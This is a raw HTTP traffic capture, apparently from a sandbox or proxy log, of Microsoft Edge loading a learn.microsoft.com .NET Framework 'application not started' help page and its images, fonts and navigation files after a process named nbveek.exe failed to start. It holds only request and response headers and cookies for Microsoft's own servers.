user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
ResponseHTTP/2.0 200
content-encoding: gzip
content-md5: p9K2cZephmNteYQqCB6oXg==
last-modified: Tue, 08 Nov 2022 17:00:29 GMT
etag: 0x8DAC1AABD99948F
x-ms-request-id: cb34626b-d01e-0004-27e7-f33a10000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0LxdrYwAAAAD3si82pJxITaQOQL7wtZAkQU1TMDRFREdFMTgxNQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 62844
vary: Accept-Encoding
cache-control: max-age=27053589
expires: Thu, 09 Nov 2023 02:58:48 GMT
date: Sat, 31 Dec 2022 00:05:39 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/banners/index.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
ResponseHTTP/2.0 200
content-type: application/json
content-encoding: gzip
last-modified: Thu, 22 Dec 2022 20:45:00 GMT
etag: "0x8DAE45D64DB7C1E"
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0ZNqkYwAAAABDy6rv7jrUSamZM+ycbhfSQU1TMDRFREdFMTkwNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=290
expires: Sat, 31 Dec 2022 00:10:29 GMT
date: Sat, 31 Dec 2022 00:05:39 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.9a89adae.woff2msedge.exeRemote address:104.73.152.149:443RequestGET /_themes/docs.theme/master/en-us/_themes/styles/docons.9a89adae.woff2 HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/aeed2be4.site-ltr.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
ResponseHTTP/2.0 200
content-type: font/woff2
last-modified: Wed, 14 Dec 2022 03:12:07 GMT
etag: "0x8DADD80FBDDADE4"
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0hs+dYwAAAAC1FYL5pqNNSLkoWFwNma2wQU1TMDRFREdFMTkxOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=468505
expires: Thu, 05 Jan 2023 10:14:05 GMT
date: Sat, 31 Dec 2022 00:05:40 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /favicon.ico HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
ResponseHTTP/2.0 200
content-type: image/x-icon
last-modified: Wed, 19 Oct 2022 02:51:31 GMT
etag: "0x8DAB17CD3D25BDA"
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0g+dPYwAAAABFprZGPneQRZ0S2WYqp9UyQU1TMDRFREdFMTkxOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=123438
expires: Sun, 01 Jan 2023 10:22:58 GMT
date: Sat, 31 Dec 2022 00:05:40 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
if-none-match: "0x8D8E3CB30F4C3E2"
if-modified-since: Wed, 10 Mar 2021 13:48:31 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:31 GMT
etag: "0x8D8E3CB30F4C3E2"
cache-control: public, max-age=1775
expires: Sat, 31 Dec 2022 00:35:20 GMT
date: Sat, 31 Dec 2022 00:05:45 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
if-none-match: "0x8D8E3CB365AA10A"
if-modified-since: Wed, 10 Mar 2021 13:48:40 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:40 GMT
etag: "0x8D8E3CB365AA10A"
cache-control: public, max-age=1790
expires: Sat, 31 Dec 2022 00:35:36 GMT
date: Sat, 31 Dec 2022 00:05:46 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
if-none-match: "0x8D8E3CB33C8B874"
if-modified-since: Wed, 10 Mar 2021 13:48:35 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:36 GMT
etag: "0x8D8E3CB3429357A"
cache-control: public, max-age=1743
expires: Sat, 31 Dec 2022 00:34:49 GMT
date: Sat, 31 Dec 2022 00:05:46 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
if-none-match: "0x8D8E3CB3429357A"
if-modified-since: Wed, 10 Mar 2021 13:48:36 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:35 GMT
etag: "0x8D8E3CB33C8B874"
cache-control: public, max-age=1785
expires: Sat, 31 Dec 2022 00:35:31 GMT
date: Sat, 31 Dec 2022 00:05:46 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/content-nav/MSDocsHeader-DotNet.json? HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
if-none-match: "0x8DADC4C64D82904"
if-modified-since: Mon, 12 Dec 2022 14:23:09 GMT
ResponseHTTP/2.0 304
last-modified: Mon, 12 Dec 2022 14:23:09 GMT
etag: "0x8DADC4C64D82904"
cache-control: public, max-age=443
expires: Sat, 31 Dec 2022 00:13:10 GMT
date: Sat, 31 Dec 2022 00:05:47 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
if-none-match: "0x8DABDC3E90AE3AD"
if-modified-since: Thu, 03 Nov 2022 17:50:35 GMT
ResponseHTTP/2.0 304
last-modified: Thu, 03 Nov 2022 17:50:35 GMT
etag: "0x8DABDC3E90AE3AD"
cache-control: public, max-age=591
expires: Sat, 31 Dec 2022 00:15:38 GMT
date: Sat, 31 Dec 2022 00:05:47 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/dotnet/breadcrumb/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
if-none-match: "0x8DAE48DCC103B02"
if-modified-since: Fri, 23 Dec 2022 02:31:29 GMT
ResponseHTTP/2.0 304
last-modified: Fri, 23 Dec 2022 02:31:29 GMT
etag: "0x8DAE48DCC103B02"
cache-control: public, max-age=551
expires: Sat, 31 Dec 2022 00:14:58 GMT
date: Sat, 31 Dec 2022 00:05:47 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/install-3-5.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448739178
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
if-none-match: "0x8D8E3CB2E2E71C7"
if-modified-since: Wed, 10 Mar 2021 13:48:26 GMT
ResponseHTTP/2.0 304
last-modified: Wed, 10 Mar 2021 13:48:26 GMT
etag: "0x8D8E3CB2E2E71C7"
cache-control: public, max-age=1789
expires: Sat, 31 Dec 2022 00:35:36 GMT
date: Sat, 31 Dec 2022 00:05:47 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0msedge.exeRemote address:104.73.152.149:443RequestGET /dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
ResponseHTTP/2.0 301
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 04HyvYwAAAAAGGdHNqYdYRYx3IjyO9z1FQU1TMDRFREdFMTgxMQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Sat, 31 Dec 2022 00:05:52 GMT
date: Sat, 31 Dec 2022 00:05:52 GMT
set-cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9;Path=/;HttpOnly;Secure;Domain=learn.microsoft.com
set-cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9;Path=/;HttpOnly;SameSite=None;Secure;Domain=learn.microsoft.com
set-cookie: original_req_url=https://learn.microsoft.com/dotnet/framework/install/application-not-started; expires=Sat, 31-Dec-2022 00:05:57 GMT; secure; HttpOnly; SameSite=Lax
akamai-cache-status: Miss from child, Miss from parent
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0msedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MicrosoftApplicationsTelemetryDeviceId=07c9a21a-c439-48f8-b7f9-d077f2f5baee
cookie: MC1=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: MS0=686a6b78ab3242c0a05e75ce59464c54
cookie: MSFPC=GUID=c683eed8cd8049c898d2e82ce1c2b696&HASH=c683&LV=202212&V=4&LU=1672445142635
cookie: ai_session=t5uI3hU9Y3ILMlpfG/2ZnE|1672448739178|1672448747901
cookie: ARRAffinity=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
cookie: ARRAffinitySameSite=afa9399236595ec00fce31f9f40314d51408a283e43e72d66a6a63b504cc2fb9
if-none-match: "8HbLinmfUCalpFY5kd8ehkcr/yCyF0uEfrGPXj82TLg="
ResponseHTTP/2.0 304
